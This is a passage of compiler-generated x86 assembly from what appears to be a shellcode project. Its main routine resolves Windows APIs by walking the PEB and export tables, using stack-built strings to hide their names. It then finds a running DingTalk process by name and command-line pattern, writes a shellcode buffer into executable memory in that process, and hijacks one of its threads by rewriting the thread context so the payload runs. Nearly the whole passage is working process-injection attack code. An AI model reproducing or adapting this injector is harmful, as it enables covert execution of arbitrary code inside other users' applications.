	mov	BYTE PTR _Thread32Next_name$[ebp+7], 50	; 00000032H
	mov	BYTE PTR _Thread32Next_name$[ebp+8], 78	; 0000004eH
	mov	BYTE PTR _Thread32Next_name$[ebp+9], 101 ; 00000065H
	mov	BYTE PTR _Thread32Next_name$[ebp+10], 120 ; 00000078H
	mov	BYTE PTR _Thread32Next_name$[ebp+11], 116 ; 00000074H
	mov	BYTE PTR _Thread32Next_name$[ebp+12], 0
; Line 147
	mov	BYTE PTR _Thread32First_name$[ebp], 84	; 00000054H
	mov	BYTE PTR _Thread32First_name$[ebp+1], 104 ; 00000068H
	mov	BYTE PTR _Thread32First_name$[ebp+2], 114 ; 00000072H
	mov	BYTE PTR _Thread32First_name$[ebp+3], 101 ; 00000065H
	mov	BYTE PTR _Thread32First_name$[ebp+4], 97 ; 00000061H
	mov	BYTE PTR _Thread32First_name$[ebp+5], 100 ; 00000064H
	mov	BYTE PTR _Thread32First_name$[ebp+6], 51 ; 00000033H
	mov	BYTE PTR _Thread32First_name$[ebp+7], 50 ; 00000032H
	mov	BYTE PTR _Thread32First_name$[ebp+8], 70 ; 00000046H
	mov	BYTE PTR _Thread32First_name$[ebp+9], 105 ; 00000069H
	mov	BYTE PTR _Thread32First_name$[ebp+10], 114 ; 00000072H
	mov	BYTE PTR _Thread32First_name$[ebp+11], 115 ; 00000073H
	mov	BYTE PTR _Thread32First_name$[ebp+12], 116 ; 00000074H
	mov	BYTE PTR _Thread32First_name$[ebp+13], 0
; Line 148
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp], 67 ; 00000043H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+1], 114 ; 00000072H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+2], 101 ; 00000065H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+3], 97 ; 00000061H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+4], 116 ; 00000074H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+5], 101 ; 00000065H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+6], 84 ; 00000054H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+7], 111 ; 0000006fH
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+8], 111 ; 0000006fH
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+9], 108 ; 0000006cH
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+10], 104 ; 00000068H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+11], 101 ; 00000065H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+12], 108 ; 0000006cH
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+13], 112 ; 00000070H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+14], 51 ; 00000033H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+15], 50 ; 00000032H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+16], 83 ; 00000053H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+17], 110 ; 0000006eH
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+18], 97 ; 00000061H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+19], 112 ; 00000070H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+20], 115 ; 00000073H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+21], 104 ; 00000068H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+22], 111 ; 0000006fH
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+23], 116 ; 00000074H
	mov	BYTE PTR _CreateToolhelp32Snapshot_name$[ebp+24], 0
; Line 151
	lea	eax, DWORD PTR _kernel32_dll_name$[ebp]
	push	eax
	call	?get_module_by_name@@YAPAXPA_W@Z	; get_module_by_name
	add	esp, 4
	mov	DWORD PTR _base$[ebp], eax
; Line 152
	cmp	DWORD PTR _base$[ebp], 0
	jne	SHORT $LN27@main
; Line 153
	mov	eax, 1
	jmp	$LN1@main
$LN27@main:
; Line 157
	lea	ecx, DWORD PTR _load_lib_name$[ebp]
	push	ecx
	mov	edx, DWORD PTR _base$[ebp]
	push	edx
	call	?get_func_by_name@@YAPAXPAXPAD@Z	; get_func_by_name
	add	esp, 8
	mov	DWORD PTR _load_lib$[ebp], eax
; Line 158
	cmp	DWORD PTR _load_lib$[ebp], 0
	jne	SHORT $LN28@main
; Line 159
	mov	eax, 1
	jmp	$LN1@main
$LN28@main:
; Line 163
	lea	eax, DWORD PTR _get_proc_name$[ebp]
	push	eax
	mov	ecx, DWORD PTR _base$[ebp]
	push	ecx
	call	?get_func_by_name@@YAPAXPAXPAD@Z	; get_func_by_name
	add	esp, 8
	mov	DWORD PTR _get_proc$[ebp], eax
; Line 164
	cmp	DWORD PTR _get_proc$[ebp], 0
	jne	SHORT $LN29@main
; Line 165
	mov	eax, 1
	jmp	$LN1@main
$LN29@main:
; Line 169
	mov	edx, DWORD PTR _load_lib$[ebp]
	mov	DWORD PTR __LoadLibraryA$[ebp], edx
; Line 171
	mov	eax, DWORD PTR _get_proc$[ebp]
	mov	DWORD PTR __GetProcAddress$[ebp], eax
; Line 179
	lea	ecx, DWORD PTR _open_process_name$[ebp]
	push	ecx
	mov	edx, DWORD PTR _base$[ebp]
	push	edx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR __OpenProcess$[ebp], eax
; Line 183
	lea	eax, DWORD PTR _get_module_handlea_name$[ebp]
	push	eax
	mov	ecx, DWORD PTR _base$[ebp]
	push	ecx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR __GetModuleHandleA$[ebp], eax
; Line 185
	lea	edx, DWORD PTR _get_current_process_name$[ebp]
	push	edx
	mov	eax, DWORD PTR _base$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR __GetCurrentProcess$[ebp], eax
; Line 195
	lea	ecx, DWORD PTR _virtual_alloc_name$[ebp]
	push	ecx
	mov	edx, DWORD PTR _base$[ebp]
	push	edx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR __VirtualAlloc$[ebp], eax
; Line 203
	lea	eax, DWORD PTR _virtual_free_name$[ebp]
	push	eax
	mov	ecx, DWORD PTR _base$[ebp]
	push	ecx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR __VirtualFree$[ebp], eax
; Line 216
	lea	edx, DWORD PTR _read_process_memory_name$[ebp]
	push	edx
	mov	eax, DWORD PTR _base$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR __ReadProcessMemory$[ebp], eax
; Line 218
	lea	ecx, DWORD PTR _nt_query_system_information_name$[ebp]
	push	ecx
	lea	edx, DWORD PTR _ntdll_name$[ebp]
	push	edx
	call	DWORD PTR __GetModuleHandleA$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fNtQuerySystemInformation$[ebp], eax
; Line 219
	lea	eax, DWORD PTR _nt_query_information_process_name$[ebp]
	push	eax
	lea	ecx, DWORD PTR _ntdll_name$[ebp]
	push	ecx
	call	DWORD PTR __GetModuleHandleA$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fNtQueryInformationProcess$[ebp], eax
; Line 221
	lea	edx, DWORD PTR _VirtualAllocEx_name$[ebp]
	push	edx
	mov	eax, DWORD PTR _base$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_VirtualAllocEx$[ebp], eax
; Line 222
	lea	ecx, DWORD PTR _WriteProcessMemory_name$[ebp]
	push	ecx
	mov	edx, DWORD PTR _base$[ebp]
	push	edx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_WriteProcessMemory$[ebp], eax
; Line 224
	lea	eax, DWORD PTR _open_thread_name$[ebp]
	push	eax
	mov	ecx, DWORD PTR _base$[ebp]
	push	ecx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_OpenThread$[ebp], eax
; Line 225
	lea	edx, DWORD PTR _SuspendThread_name$[ebp]
	push	edx
	mov	eax, DWORD PTR _base$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_SuspendThread$[ebp], eax
; Line 226
	lea	ecx, DWORD PTR _ResumeThread_name$[ebp]
	push	ecx
	mov	edx, DWORD PTR _base$[ebp]
	push	edx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_ResumeThread$[ebp], eax
; Line 227
	lea	eax, DWORD PTR _GetThreadContext_name$[ebp]
	push	eax
	mov	ecx, DWORD PTR _base$[ebp]
	push	ecx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_GetThreadContext$[ebp], eax
; Line 228
	lea	edx, DWORD PTR _SetThreadContext_name$[ebp]
	push	edx
	mov	eax, DWORD PTR _base$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_SetThreadContext$[ebp], eax
; Line 230
	lea	ecx, DWORD PTR _CreateToolhelp32Snapshot_name$[ebp]
	push	ecx
	mov	edx, DWORD PTR _base$[ebp]
	push	edx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_CreateToolhelp32Snapshot$[ebp], eax
; Line 231
	lea	eax, DWORD PTR _Thread32First_name$[ebp]
	push	eax
	mov	ecx, DWORD PTR _base$[ebp]
	push	ecx
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_Thread32First$[ebp], eax
; Line 232
	lea	edx, DWORD PTR _Thread32Next_name$[ebp]
	push	edx
	mov	eax, DWORD PTR _base$[ebp]
	push	eax
	call	DWORD PTR __GetProcAddress$[ebp]
	mov	DWORD PTR _fn_Thread32Next$[ebp], eax
; Line 235
	push	4
	push	4096					; 00001000H
	push	1048576					; 00100000H
	push	0
	call	DWORD PTR __VirtualAlloc$[ebp]
	mov	DWORD PTR _pInfo$[ebp], eax
; Line 236
	cmp	DWORD PTR _pInfo$[ebp], 0
	jne	SHORT $LN30@main
; Line 237
	mov	eax, 1
	jmp	$LN1@main
$LN30@main:
; Line 239
	mov	DWORD PTR _uReturnedLEngth$[ebp], 0
; Line 240
	lea	ecx, DWORD PTR _uReturnedLEngth$[ebp]
	push	ecx
	push	1048576					; 00100000H
	mov	edx, DWORD PTR _pInfo$[ebp]
	push	edx
	push	5
	call	DWORD PTR _fNtQuerySystemInformation$[ebp]
	mov	DWORD PTR _status$[ebp], eax
; Line 241
	cmp	DWORD PTR _status$[ebp], 0
	je	SHORT $LN31@main
; Line 242
	mov	eax, 1
	jmp	$LN1@main
$LN31@main:
; Line 244
	mov	eax, DWORD PTR _pInfo$[ebp]
	mov	DWORD PTR _pSystemInformation$[ebp], eax
; Line 246
	mov	ecx, DWORD PTR _pSystemInformation$[ebp]
	mov	edx, DWORD PTR [ecx+60]
	mov	DWORD PTR _pImageName$[ebp], edx
; Line 247
	mov	eax, DWORD PTR _pSystemInformation$[ebp]
	mov	ecx, DWORD PTR [eax+68]
	mov	DWORD PTR _dwID$[ebp], ecx
; Line 248
	mov	DWORD PTR _hProcess$[ebp], 0
; Line 251
	xor	edx, edx
	mov	WORD PTR _usCmdLen$[ebp], dx
; Line 252
	xor	eax, eax
	mov	WORD PTR _usPathLen$[ebp], ax
; Line 253
	mov	DWORD PTR _dwPatternLength$[ebp], 26	; 0000001aH
; Line 254
	mov	DWORD PTR _dwNetWorkInstPID$[ebp], 0
; Line 256
	mov	DWORD PTR _nImageNameLength$[ebp], 0
$LN2@main:
; Line 259
	mov	ecx, 1
	test	ecx, ecx
	je	$LN3@main
; Line 260
	mov	edx, DWORD PTR _pSystemInformation$[ebp]
	cmp	DWORD PTR [edx], 0
	jne	SHORT $LN32@main
; Line 261
	jmp	$LN3@main
$LN32@main:
; Line 263
	mov	eax, DWORD PTR _pSystemInformation$[ebp]
	mov	ecx, DWORD PTR _pSystemInformation$[ebp]
	add	ecx, DWORD PTR [eax]
	mov	DWORD PTR _pSystemInformation$[ebp], ecx
; Line 264
	mov	edx, DWORD PTR _pSystemInformation$[ebp]
	mov	eax, DWORD PTR [edx+60]
	mov	DWORD PTR _pImageName$[ebp], eax
; Line 265
	mov	DWORD PTR _nImageNameLength$[ebp], 0
	jmp	SHORT $LN6@main
$LN4@main:
	mov	ecx, DWORD PTR _nImageNameLength$[ebp]
	add	ecx, 1
	mov	DWORD PTR _nImageNameLength$[ebp], ecx
$LN6@main:
	mov	edx, DWORD PTR _nImageNameLength$[ebp]
	mov	eax, DWORD PTR _pImageName$[ebp]
	movzx	ecx, WORD PTR [eax+edx*2]
	test	ecx, ecx
	je	SHORT $LN5@main
	jmp	SHORT $LN4@main
$LN5@main:
; Line 266
	cmp	DWORD PTR _nImageNameLength$[ebp], 12	; 0000000cH
	je	SHORT $LN33@main
; Line 267
	jmp	SHORT $LN2@main
$LN33@main:
; Line 269
	mov	DWORD PTR _isDingtalk$6[ebp], 1
; Line 270
	mov	DWORD PTR _nIndex$15[ebp], 0
	jmp	SHORT $LN9@main
$LN7@main:
	mov	edx, DWORD PTR _nIndex$15[ebp]
	add	edx, 1
	mov	DWORD PTR _nIndex$15[ebp], edx
$LN9@main:
	mov	eax, DWORD PTR _nIndex$15[ebp]
	cmp	eax, DWORD PTR _nImageNameLength$[ebp]
	jge	SHORT $LN8@main
; Line 271
	mov	ecx, DWORD PTR _nIndex$15[ebp]
	mov	edx, DWORD PTR _pImageName$[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	mov	ecx, DWORD PTR _nIndex$15[ebp]
	movzx	edx, WORD PTR _dingtalk$[ebp+ecx*2]
	cmp	eax, edx
	je	SHORT $LN34@main
	mov	eax, DWORD PTR _nIndex$15[ebp]
	mov	ecx, DWORD PTR _pImageName$[ebp]
	movzx	edx, WORD PTR [ecx+eax*2]
	mov	eax, DWORD PTR _nIndex$15[ebp]
	movzx	ecx, WORD PTR _dingtalk_upper$[ebp+eax*2]
	cmp	edx, ecx
	je	SHORT $LN34@main
; Line 272
	mov	DWORD PTR _isDingtalk$6[ebp], 0
; Line 273
	jmp	SHORT $LN8@main
$LN34@main:
; Line 275
	jmp	SHORT $LN7@main
$LN8@main:
; Line 277
	cmp	DWORD PTR _isDingtalk$6[ebp], 0
	jne	SHORT $LN35@main
; Line 278
	jmp	$LN2@main
$LN35@main:
; Line 282
	mov	edx, DWORD PTR _pSystemInformation$[ebp]
	mov	eax, DWORD PTR [edx+68]
	mov	DWORD PTR _dwID$[ebp], eax
; Line 283
	mov	ecx, DWORD PTR _dwID$[ebp]
	push	ecx
	push	0
	push	1040					; 00000410H
	call	DWORD PTR __OpenProcess$[ebp]
	mov	DWORD PTR _hProcess$[ebp], eax
; Line 284
	push	0
	push	24					; 00000018H
	lea	edx, DWORD PTR _pbi$[ebp]
	push	edx
	push	0
	mov	eax, DWORD PTR _hProcess$[ebp]
	push	eax
	call	DWORD PTR _fNtQueryInformationProcess$[ebp]
	mov	DWORD PTR _status2$5[ebp], eax
; Line 285
	cmp	DWORD PTR _status2$5[ebp], 0
	je	SHORT $LN36@main
; Line 287
	jmp	$LN2@main
$LN36@main:
; Line 290
	mov	DWORD PTR _nPebIndex$10[ebp], 0
	jmp	SHORT $LN12@main
$LN10@main:
	mov	ecx, DWORD PTR _nPebIndex$10[ebp]
	add	ecx, 1
	mov	DWORD PTR _nPebIndex$10[ebp], ecx
$LN12@main:
	cmp	DWORD PTR _nPebIndex$10[ebp], 472	; 000001d8H
	jae	SHORT $LN11@main
; Line 291
	mov	edx, DWORD PTR _nPebIndex$10[ebp]
	mov	BYTE PTR _peb$1[ebp+edx], 0
; Line 292
	jmp	SHORT $LN10@main
$LN11@main:
; Line 294
	mov	DWORD PTR _nParamIndex$9[ebp], 0
	jmp	SHORT $LN15@main
$LN13@main:
	mov	eax, DWORD PTR _nParamIndex$9[ebp]
	add	eax, 1
	mov	DWORD PTR _nParamIndex$9[ebp], eax
$LN15@main:
	cmp	DWORD PTR _nParamIndex$9[ebp], 72	; 00000048H
	jae	SHORT $LN14@main
; Line 295
	mov	ecx, DWORD PTR _nParamIndex$9[ebp]
	mov	BYTE PTR _Param$2[ebp+ecx], 0
; Line 296
	jmp	SHORT $LN13@main
$LN14@main:
; Line 297
	xor	edx, edx
	mov	WORD PTR _usCmdLen$4[ebp], dx
; Line 298
	xor	eax, eax
	mov	WORD PTR _usPathLen$3[ebp], ax
; Line 299
	mov	DWORD PTR _dwRead$16[ebp], 0
; Line 300
	lea	ecx, DWORD PTR _dwRead$16[ebp]
	push	ecx
	push	472					; 000001d8H
	lea	edx, DWORD PTR _peb$1[ebp]
	push	edx
	mov	eax, DWORD PTR _pbi$[ebp+4]
	push	eax
	mov	ecx, DWORD PTR _hProcess$[ebp]
	push	ecx
	call	DWORD PTR __ReadProcessMemory$[ebp]
; Line 301
	cmp	DWORD PTR _dwRead$16[ebp], 0
	jne	SHORT $LN37@main
; Line 302
	jmp	$LN2@main
$LN37@main:
; Line 304
	mov	DWORD PTR _dwRead$16[ebp], 0
; Line 305
	lea	edx, DWORD PTR _dwRead$16[ebp]
	push	edx
	push	72					; 00000048H
	lea	eax, DWORD PTR _Param$2[ebp]
	push	eax
	mov	ecx, DWORD PTR _peb$1[ebp+16]
	push	ecx
	mov	edx, DWORD PTR _hProcess$[ebp]
	push	edx
	call	DWORD PTR __ReadProcessMemory$[ebp]
; Line 306
	cmp	DWORD PTR _dwRead$16[ebp], 0
	jne	SHORT $LN38@main
; Line 307
	jmp	$LN2@main
$LN38@main:
; Line 309
	movzx	eax, WORD PTR _Param$2[ebp+64]
	test	eax, eax
	jne	SHORT $LN39@main
; Line 310
	jmp	$LN2@main
$LN39@main:
; Line 312
	movzx	ecx, WORD PTR _Param$2[ebp+66]
	shl	ecx, 1
	mov	DWORD PTR _dwBufferLength$8[ebp], ecx
; Line 313
	push	4
	push	4096					; 00001000H
	mov	edx, DWORD PTR _dwBufferLength$8[ebp]
	push	edx
	push	0
	call	DWORD PTR __VirtualAlloc$[ebp]
	mov	DWORD PTR _pCmdLine$13[ebp], eax
; Line 314
	cmp	DWORD PTR _pCmdLine$13[ebp], 0
	jne	SHORT $LN40@main
; Line 315
	jmp	$LN2@main
$LN40@main:
; Line 317
	mov	DWORD PTR _nByteIndex$12[ebp], 0
	jmp	SHORT $LN18@main
$LN16@main:
	mov	eax, DWORD PTR _nByteIndex$12[ebp]
	add	eax, 1
	mov	DWORD PTR _nByteIndex$12[ebp], eax
$LN18@main:
	mov	ecx, DWORD PTR _nByteIndex$12[ebp]
	cmp	ecx, DWORD PTR _dwBufferLength$8[ebp]
	jae	SHORT $LN17@main
; Line 318
	mov	edx, DWORD PTR _pCmdLine$13[ebp]
	add	edx, DWORD PTR _nByteIndex$12[ebp]
	mov	BYTE PTR [edx], 0
; Line 319
	jmp	SHORT $LN16@main
$LN17@main:
; Line 320
	mov	DWORD PTR _dwRead$16[ebp], 0
; Line 321
	lea	eax, DWORD PTR _dwRead$16[ebp]
	push	eax
	movzx	ecx, WORD PTR _Param$2[ebp+64]
	push	ecx
	mov	edx, DWORD PTR _pCmdLine$13[ebp]
	push	edx
	mov	eax, DWORD PTR _Param$2[ebp+68]
	push	eax
	mov	ecx, DWORD PTR _hProcess$[ebp]
	push	ecx
	call	DWORD PTR __ReadProcessMemory$[ebp]
; Line 322
	cmp	DWORD PTR _dwRead$16[ebp], 0
	jne	SHORT $LN41@main
; Line 323
	jmp	$LN2@main
$LN41@main:
; Line 325
	mov	edx, DWORD PTR _pCmdLine$13[ebp]
	mov	DWORD PTR _pIndexOfCmdLine$11[ebp], edx
$LN19@main:
; Line 328
	mov	eax, DWORD PTR _pIndexOfCmdLine$11[ebp]
	movzx	ecx, WORD PTR [eax]
	test	ecx, ecx
	je	SHORT $LN20@main
; Line 329
	mov	DWORD PTR _bMatch$7[ebp], 1
; Line 330
	mov	DWORD PTR _nCount$14[ebp], 0
	jmp	SHORT $LN23@main
$LN21@main:
	mov	edx, DWORD PTR _nCount$14[ebp]
	add	edx, 1
	mov	DWORD PTR _nCount$14[ebp], edx
$LN23@main:
	mov	eax, DWORD PTR _nCount$14[ebp]
	cmp	eax, DWORD PTR _dwPatternLength$[ebp]
	jae	SHORT $LN22@main
; Line 331
	mov	ecx, DWORD PTR _nCount$14[ebp]
	mov	edx, DWORD PTR _pIndexOfCmdLine$11[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	mov	ecx, DWORD PTR _nCount$14[ebp]
	movzx	edx, WORD PTR _dingtalk_pattern$[ebp+ecx*2]
	cmp	eax, edx
	je	SHORT $LN42@main
; Line 332
	mov	DWORD PTR _bMatch$7[ebp], 0
; Line 333
	jmp	SHORT $LN22@main
$LN42@main:
; Line 335
	jmp	SHORT $LN21@main
$LN22@main:
; Line 336
	cmp	DWORD PTR _bMatch$7[ebp], 0
	je	SHORT $LN43@main
; Line 337
	mov	eax, DWORD PTR _dwID$[ebp]
	mov	DWORD PTR _dwNetWorkInstPID$[ebp], eax
; Line 338
	jmp	SHORT $LN20@main
$LN43@main:
; Line 340
	mov	ecx, DWORD PTR _pIndexOfCmdLine$11[ebp]
	add	ecx, 2
	mov	DWORD PTR _pIndexOfCmdLine$11[ebp], ecx
; Line 341
	jmp	SHORT $LN19@main
$LN20@main:
; Line 342
	push	32768					; 00008000H
	mov	edx, DWORD PTR _dwBufferLength$8[ebp]
	push	edx
	mov	eax, DWORD PTR _pCmdLine$13[ebp]
	push	eax
	call	DWORD PTR __VirtualFree$[ebp]
; Line 343
	cmp	DWORD PTR _dwNetWorkInstPID$[ebp], 0
	je	SHORT $LN44@main
; Line 344
	jmp	SHORT $LN3@main
$LN44@main:
; Line 346
	jmp	$LN2@main
$LN3@main:
; Line 347
	push	32768					; 00008000H
	push	1048576					; 00100000H
	mov	ecx, DWORD PTR _pInfo$[ebp]
	push	ecx
	call	DWORD PTR __VirtualFree$[ebp]
; Line 349
	cmp	DWORD PTR _dwNetWorkInstPID$[ebp], 0
	jne	SHORT $LN45@main
; Line 350
	mov	eax, 1
	jmp	$LN1@main
$LN45@main:
; Line 355
	mov	edx, DWORD PTR _dwNetWorkInstPID$[ebp]
	push	edx
	push	0
	push	2097151					; 001fffffH
	call	DWORD PTR __OpenProcess$[ebp]
	mov	DWORD PTR _TargetProcess$[ebp], eax
; Line 356
	push	64					; 00000040H
	push	12288					; 00003000H
	push	354					; 00000162H
	push	0
	mov	eax, DWORD PTR _TargetProcess$[ebp]
	push	eax
	call	DWORD PTR _fn_VirtualAllocEx$[ebp]
	mov	DWORD PTR _AllocMemory$[ebp], eax
; Line 357
	push	0
	push	354					; 00000162H
	lea	ecx, DWORD PTR _shellcode$[ebp]
	push	ecx
	mov	edx, DWORD PTR _AllocMemory$[ebp]
	push	edx
	mov	eax, DWORD PTR _TargetProcess$[ebp]
	push	eax
	call	DWORD PTR _fn_WriteProcessMemory$[ebp]
; Line 361
	push	0
	push	4
	call	DWORD PTR _fn_CreateToolhelp32Snapshot$[ebp]
	mov	DWORD PTR _hThreadSnap$[ebp], eax
; Line 362
	mov	DWORD PTR _threadEntry$[ebp], 28	; 0000001cH
	mov	DWORD PTR _threadEntry$[ebp+4], 0
	mov	DWORD PTR _threadEntry$[ebp+8], 0
	mov	DWORD PTR _threadEntry$[ebp+12], 0
	mov	DWORD PTR _threadEntry$[ebp+16], 0
	mov	DWORD PTR _threadEntry$[ebp+20], 0
	mov	DWORD PTR _threadEntry$[ebp+24], 0
; Line 363
	mov	DWORD PTR _threadHandle$[ebp], 0
; Line 364
	lea	ecx, DWORD PTR _threadEntry$[ebp]
	push	ecx
	mov	edx, DWORD PTR _hThreadSnap$[ebp]
	push	edx
	call	DWORD PTR _fn_Thread32First$[ebp]
	test	eax, eax
	je	SHORT $LN46@main
$LN26@main:
; Line 366
	mov	eax, DWORD PTR _threadEntry$[ebp+12]
	cmp	eax, DWORD PTR _dwNetWorkInstPID$[ebp]
	jne	SHORT $LN24@main
; Line 367
	mov	ecx, DWORD PTR _threadEntry$[ebp+8]
	mov	DWORD PTR _Tid$[ebp], ecx
; Line 368
	jmp	SHORT $LN46@main
$LN24@main:
; Line 370
	lea	edx, DWORD PTR _threadEntry$[ebp]
	push	edx
	mov	eax, DWORD PTR _hThreadSnap$[ebp]
	push	eax
	call	DWORD PTR _fn_Thread32Next$[ebp]
	test	eax, eax
	jne	SHORT $LN26@main
$LN46@main:
; Line 373
	mov	ecx, DWORD PTR _Tid$[ebp]
	push	ecx
	push	1
	push	2097151					; 001fffffH
	call	DWORD PTR _fn_OpenThread$[ebp]
	mov	DWORD PTR _hThread$[ebp], eax
; Line 375
	mov	edx, DWORD PTR _hThread$[ebp]
	push	edx
	call	DWORD PTR _fn_SuspendThread$[ebp]
; Line 377
	mov	DWORD PTR _lpContext$[ebp], 65599	; 0001003fH
; Line 380
	lea	eax, DWORD PTR _lpContext$[ebp]
	push	eax
	mov	ecx, DWORD PTR _hThread$[ebp]
	push	ecx
	call	DWORD PTR _fn_GetThreadContext$[ebp]
; Line 381
	mov	edx, DWORD PTR _AllocMemory$[ebp]
	mov	DWORD PTR _lpContext$[ebp+184], edx
; Line 382
	lea	eax, DWORD PTR _lpContext$[ebp]
	push	eax
	mov	ecx, DWORD PTR _hThread$[ebp]
	push	ecx
	call	DWORD PTR _fn_SetThreadContext$[ebp]
; Line 383
	mov	edx, DWORD PTR _hThread$[ebp]
	push	edx
	call	DWORD PTR _fn_ResumeThread$[ebp]
; Line 384
	xor	eax, eax
$LN1@main:
; Line 385
	mov	esp, ebp
	pop	ebp
	ret	0
_main	ENDP
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_func_by_name@@YAPAXPAXPAD@Z
_TEXT	SEGMENT
_funcRVA$1 = -60					; size = 4
_nameRVA$2 = -56					; size = 4
_nameIndex$3 = -52					; size = 4
_funcsListRVA$ = -48					; size = 4
_namesOrdsListRVA$ = -44				; size = 4
_funcNamesListRVA$ = -40				; size = 4
_namesCount$ = -36					; size = 4
_expAddr$ = -32						; size = 4
_nt_headers$ = -28					; size = 4
_exportsDir$ = -24					; size = 4
_idh$ = -20						; size = 4
_curr_name$4 = -16					; size = 4
_exp$ = -12						; size = 4
_i$5 = -8						; size = 4
_k$6 = -4						; size = 4
_module$ = 8						; size = 4
_func_name$ = 12					; size = 4
?get_func_by_name@@YAPAXPAXPAD@Z PROC			; get_func_by_name, COMDAT
; File c:\users\ronpa\desktop\shellcode\shellcode\peb-lookup.h
; Line 170
	push	ebp
	mov	ebp, esp
	sub	esp, 60					; 0000003cH
; Line 171
	mov	eax, DWORD PTR _module$[ebp]
	mov	DWORD PTR _idh$[ebp], eax
; Line 172
	mov	ecx, DWORD PTR _idh$[ebp]
	movzx	edx, WORD PTR [ecx]
	cmp	edx, 23117				; 00005a4dH
	je	SHORT $LN8@get_func_b
; Line 173
	xor	eax, eax
	jmp	$LN1@get_func_b
$LN8@get_func_b:
; Line 175
	mov	eax, DWORD PTR _idh$[ebp]
	mov	ecx, DWORD PTR _module$[ebp]
	add	ecx, DWORD PTR [eax+60]
	mov	DWORD PTR _nt_headers$[ebp], ecx
; Line 176
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _nt_headers$[ebp]
	lea	edx, DWORD PTR [ecx+eax+120]
	mov	DWORD PTR _exportsDir$[ebp], edx
; Line 177
	mov	eax, DWORD PTR _exportsDir$[ebp]
	cmp	DWORD PTR [eax], 0
	jne	SHORT $LN9@get_func_b
; Line 178
	xor	eax, eax
	jmp	$LN1@get_func_b
$LN9@get_func_b:
; Line 181
	mov	ecx, DWORD PTR _exportsDir$[ebp]
	mov	edx, DWORD PTR [ecx]
	mov	DWORD PTR _expAddr$[ebp], edx
; Line 182
	mov	eax, DWORD PTR _expAddr$[ebp]
	add	eax, DWORD PTR _module$[ebp]
	mov	DWORD PTR _exp$[ebp], eax
; Line 183
	mov	ecx, DWORD PTR _exp$[ebp]
	mov	edx, DWORD PTR [ecx+24]
	mov	DWORD PTR _namesCount$[ebp], edx
; Line 185
	mov	eax, DWORD PTR _exp$[ebp]
	mov	ecx, DWORD PTR [eax+28]
	mov	DWORD PTR _funcsListRVA$[ebp], ecx
; Line 186
	mov	edx, DWORD PTR _exp$[ebp]
	mov	eax, DWORD PTR [edx+32]
	mov	DWORD PTR _funcNamesListRVA$[ebp], eax
; Line 187
	mov	ecx, DWORD PTR _exp$[ebp]
	mov	edx, DWORD PTR [ecx+36]
	mov	DWORD PTR _namesOrdsListRVA$[ebp], edx
; Line 190
	mov	DWORD PTR _i$5[ebp], 0
	jmp	SHORT $LN4@get_func_b
$LN2@get_func_b:
	mov	eax, DWORD PTR _i$5[ebp]
	add	eax, 1
	mov	DWORD PTR _i$5[ebp], eax
$LN4@get_func_b:
	mov	ecx, DWORD PTR _i$5[ebp]
	cmp	ecx, DWORD PTR _namesCount$[ebp]
	jae	$LN3@get_func_b
; Line 191
	mov	edx, DWORD PTR _module$[ebp]
	add	edx, DWORD PTR _funcNamesListRVA$[ebp]
	mov	eax, DWORD PTR _i$5[ebp]
	lea	ecx, DWORD PTR [edx+eax*4]
	mov	DWORD PTR _nameRVA$2[ebp], ecx
; Line 192
	mov	edx, DWORD PTR _module$[ebp]
	add	edx, DWORD PTR _namesOrdsListRVA$[ebp]
	mov	eax, DWORD PTR _i$5[ebp]
